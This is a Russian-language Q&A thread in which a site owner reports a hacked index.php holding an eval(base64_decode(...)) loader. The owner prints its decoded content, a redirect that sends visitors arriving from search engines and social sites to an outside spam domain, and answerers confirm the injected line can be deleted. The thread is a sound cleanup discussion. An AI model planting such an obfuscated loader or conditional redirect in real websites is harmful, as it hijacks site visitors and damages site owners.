# Index.php вредоносный код

Tags: php

В общем у меня на сайте есть модифицированные файлы index.php и index2.php. В них есть вредоносный код: `<?php eval(base64_decode("Wyd`I и так далее. Благодаря одному сайту я разобрал содержание этого кода, но есть 1 "но". Я вообще не знаком с php. Я так понял, что `eval(base64_decode("WydI` и так далее нужно удалить. А `<?php` нужно оставлять?   Нужно что-то другое писать вместо этого кода?

Вот перевод кода:

```
['HTTP_USER_AGENT']; if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){     header("Location: http://bestru2.onedumb.com/"); exit(); } } }
```

Comment: Вынесите код на pastebin.com я вам проведу мини инструкцию по расшифровке.

Comment: Расшифровать не надо. У меня есть и начальный код и переведенный (вверху). Если можешь подскажи как я могу с этим поступить?

Answer (score 2, accepted):

Да, <?php оставь.
Только почему ты уверен, что код вредоносный? Бывает, там шифруют и безобидную рекламу.

И нужно знать содержимое, что там зашифровано. Может быть там импортируется какой то нужный модуль и без него работать не будет.

Comment: потому что я его перевел на нормальный язык. Суть модуля заключается в том чтобы в неких поисковых системах (гугл или яндекс) переводить с нужного сайта на левый (переадресация)

Comment: если только это, и ничего другого не делает, то можешь удалять

Comment: Посмотри вверху там расшифровка кода.

Comment: да, можешь удалять

Comment: > Только почему ты уверен, что код
> вредоносный?

@modos189 потому что обсуждалось и советывалось [тут][1]


  [1]: http://hashcode.ru/questions/170461/joomla-переадресация-в-поисковиках

Comment: @Palmervan ясно, ну автор уже привел расшифрованный код, так что сомнений нет